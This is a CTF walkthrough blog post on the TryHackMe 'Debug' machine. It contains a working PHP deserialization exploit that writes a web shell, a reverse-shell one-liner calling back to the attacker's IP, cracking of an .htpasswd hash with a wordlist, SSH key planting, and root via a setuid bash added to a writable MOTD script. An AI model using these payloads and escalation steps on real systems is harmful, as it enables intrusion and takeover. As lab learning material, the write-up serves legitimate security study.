THM: Debug
Debug
Linux Machine CTF! You’ll learn about enumeration, finding hidden password files and how to exploit php deserialization!
Medium rated. This is Debug from THM. Everything seems to have been kicking my ass lately (yes, I prefer the American spelling for that expression). I’ve also been a bit lacking in motivation. However, I am still doing something every day. I didn’t really get anywhere yet with SafeZone on THM. I did Spectra on HTB - did I mention that? Also I’ve got user on Armageddon and I think I know how to get root but I haven’t done it yet.
Am I getting off track? Back to Debug.
Ports
SSH and HTTP, but we already knew it was PHP deserialization so we’re looking for some PHP code I guess.
HTTP
We have index.html which is the Apache default page, plus index.php which isn’t. This has some fields in which we can submit some user input … maybe something that can be deserialized? Lol.
I hadn’t done this before and it took me some reading. Which I liked, so yay! Anyway, we need some more info.
Feroxbuster (my weapon of choice these days) points us to /backup/. What’s there? A directory listing!
[DIR] grid/ 2021-03-09
[ ] index.html.bak 2021-03-09 20:10
[ ] index.php.bak 2021-03-09 20:10
[DIR] javascripts/ 2021-03-09 20:10
[DIR] less/ 2021-03-09 20:10
[ ] readme.md 2021-03-09 20:10
[TXT] style.css 2021-03-09 20:10
What we want is the index.php.bak so we can examine the source code. Good reading material here, and I used this pdf.
Vulnerable Code
<?php
class FormSubmit {
public $form_file = 'message.txt';
public $message = '';
public function SaveMessage() {
$NameArea = $_GET['name'];
$EmailArea = $_GET['email'];
$TextArea = $_GET['comments'];
$this-> message = "Message From : " . $NameArea . " || From Email : " . $EmailArea . " || Comment : " . $TextArea . "\n";
}
public function __destruct() {
file_put_contents(__DIR__ . '/' . $this->form_file,$this->message,FILE_APPEND);
echo 'Your submission has been successfully saved!';
}
}
// Leaving this for now... only for debug purposes... do not touch!
$debug = $_GET['debug'] ?? '';
$messageDebug = unserialize($debug);
$application = new FormSubmit;
$application -> SaveMessage();
?>Okay, I removed a few spaces and whatnot. So we have a class FormSubmit that creates a file called message.txt and puts it in the webroot, and appends stuff to it. Here’s what I came up with for an exploit:
<?php
require 'index.php';
$o=new FormSubmit();
$o->form_file='cmd.php';
$o->message='<?php echo system($_GET[\'cmd\']); ?>';
echo serialize($o);
?>So I’m creating my own file called cmd.php and adding the classic PHP command execute code into it. I run this from the command line via:
php -f test.php
and the serialized output is:
O:10:”FormSubmit”:2:{s:9:”form_file”;s:7:”cmd.php”;s:7:”message”;s:35:”<?php echo system($_GET[‘cmd’]); ?>”;}
Sending this with the debug parameter, e.g.
GET /index.php?debug=O%3a10%3a"FormSubmit"%3a2%3a{s%3a9%3a"form_file"%3bs%3a7%3a"cmd.php"%3bs%3a7%3a"message"%3bs%3a35%3a"<%3fphp+echo+system($_GET['cmd'])%3b+%3f>"%3b} HTTP/1.1
Creates the cmd.php file, and sending it a shell gets us on the box:
cmd.php?cmd=php+-r+'$sock%3dfsockopen("10.9.10.123",1234)%3bexec("/bin/sh+-i+<%263+>%263+2>%263")%3b'
┌──(root💀kali)-[/opt/thm/debug]
└─# nc -nvlp 1234
listening on [any] 1234 ...
connect to [10.9.10.123] from (UNKNOWN) [10.10.151.167] 37988
/bin/sh: 0: cant access tty; job control turned off
$ cd /home
$ ls -lash
total 28K
4.0K drwxr-xr-x 4 root root 4.0K Mar 10 18:26 .
4.0K drwxr-xr-x 24 root root 4.0K Feb 28 2019 ..
4.0K drwx------ 17 james james 4.0K Mar 10 18:37 james
16K drwx------ 2 root root 16K Feb 28 2019 lost+found
$ cd james
/bin/sh: 3: cd: cant cd to jamesJames
We need to be James. We are not James.
www-data@osboxes:/var/www/html$ grep -r james
grep -r james
.htpasswd:james:$apr1$zPZMix2A$d8fBXH0em33bfI9UTt9Nq1Not too hard to find.
┌──(root💀kali)-[/opt/thm/debug]
└─# john hash -w=/usr/share/wordlists/rockyou.txt
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
REDACTED (?)
1g 0:00:00:00 DONE (2021-03-31 05:56) 50.00g/s 38400p/s 38400c/s 38400C/s evelyn..james1
Use the "--show" option to display all of the cracked passwords reliably
Session completedNow we can become James:
www-data@osboxes:/var/www/html$ su james
su james
Password: REDACTED
james@osboxes:/var/www/html$ cd /home/jamesLet’s make it easier for ourselves:
james@osboxes:~/.ssh$ printf 'ssh-rsa AAAAB__ my id_rsa.pub key here __YV9M= root@kali\n' >> authorized_keys
<xcl/orK+T8Srs44WzqlbHv56qKJT3kYV9M= root@kali\n' >> authorized_keysAnd we can SSH in:
┌──(root💀kali)-[/opt/thm/debug]
└─# ssh james@10.10.151.167
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-45-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
439 packages can be updated.
380 updates are security updates.
Last login: Wed Mar 31 05:59:00 2021 from 10.9.10.123Now what?
Root
We have this note:
james@osboxes:~$ cat Note-To-James.txt
Dear James,
As you may already know, we are soon planning to submit this machine to THM’s CyberSecurity Platform! Crazy… Isn’t it?
But there’s still one thing I’d like you to do, before the submission.
Could you please make our ssh welcome message a bit more pretty… you know… something beautiful :D
I gave you access to modify all these files :)
Oh and one last thing… You gotta hurry up! We don’t have much time left until the submission!
Best Regards,
root
SSH welcome message files eh? That’s in /etc/update-motd.d then?
james@osboxes:/etc/update-motd.d$ ls -lash
total 44K
4.0K drwxr-xr-x 2 root root 4.0K Mar 10 18:38 .
12K drwxr-xr-x 134 root root 12K Mar 10 20:08 ..
4.0K -rwxrwxr-x 1 root james 1.2K Mar 10 18:32 00-header
0 -rwxrwxr-x 1 root james 0 Mar 10 18:38 00-header.save
4.0K -rwxrwxr-x 1 root james 1.2K Jun 14 2016 10-help-text
4.0K -rwxrwxr-x 1 root james 97 Dec 7 2018 90-updates-available
4.0K -rwxrwxr-x 1 root james 299 Jul 22 2016 91-release-upgrade
4.0K -rwxrwxr-x 1 root james 142 Dec 7 2018 98-fsck-at-reboot
4.0K -rwxrwxr-x 1 root james 144 Dec 7 2018 98-reboot-required
4.0K -rwxrwxr-x 1 root james 604 Nov 5 2017 99-esmSo yes, we have access to these files. What is it for?
The basic design is rather simple. The update-motd package creates a directory, /etc/update-motd.d, and installs a cronjob, /etc/cron.d/update-motd, which calls /usr/sbin/update-motd every 10 minutes (by default).
/usr/sbin/update-motd uses run-parts to execute each script in /etc/update-motd.d in lexigraphic order, concatenating the results with the message-of-the-day header, /etc/motd.tail.
In this way, users, or even other packages can drop scripts into /etc/update-motd.d to affect the MOTD.
So we can edit these files, and get ourselves root. Okey dokey. There are myriad choices here. I added this line:
chmod +s /bin/bash
To the end of 00-header. Did it work?
Before:
james@osboxes:/etc/update-motd.d$ ls -lash /bin | grep bash
1016K -rwxr-xr-x 1 root root 1014K May 16 2017 bash
0 lrwxrwxrwx 1 root root 4 Feb 28 2019 rbash -> bashAfter:
james@osboxes:/etc/update-motd.d$ ls -lash /bin | grep bash
1016K -rwsr-sr-x 1 root root 1014K May 16 2017 bash
0 lrwxrwxrwx 1 root root 4 Feb 28 2019 rbash -> bashAnd when I log in?
──(root💀kali)-[/opt/thm/debug]
└─# ssh james@10.10.151.167 130 ⨯
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-45-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
439 packages can be updated.
380 updates are security updates.
Last login: Wed Mar 31 06:17:17 2021 from 10.9.10.123
-bash-4.3$ id
uid=1001(james) gid=1001(james) groups=1001(james)
-bash-4.3$ bash -p
bash-4.3# id
uid=1001(james) gid=1001(james) euid=0(root) egid=0(root) groups=0(root),1001(james)
bash-4.3# cd /root
bash-4.3# ls -lash
total 48K
4.0K drwx------ 7 root root 4.0K Mar 10 18:36 .
4.0K drwxr-xr-x 24 root root 4.0K Feb 28 2019 ..
4.0K -rw------- 1 root root 1.3K Mar 10 18:38 .bash_history
4.0K -rw-r--r-- 1 root root 3.1K Oct 22 2015 .bashrc
4.0K drwxr-xr-x 3 root root 4.0K Mar 9 20:01 .bundle
4.0K drwx------ 2 root root 4.0K Mar 10 18:36 .cache
4.0K drwxr-xr-x 3 root root 4.0K Mar 9 20:00 .gem
4.0K drwxr-xr-x 2 root root 4.0K Mar 10 18:35 .nano
4.0K -rw-r--r-- 1 root root 148 Aug 17 2015 .profile
4.0K -rw-r--r-- 1 root root 33 Mar 9 20:56 root.txt
4.0K drwx------ 2 root root 4.0K Mar 9 20:55 .ssh
4.0K -rw-r--r-- 1 root root 211 Mar 9 19:59 .wget-hsts
bash-4.3# cat root.txt
HAHHAHHAHA GO DO IT YOURSELFI enjoyed this one, learned some stuff and actually felt like I achieved something so three thumbs up to ustoun0.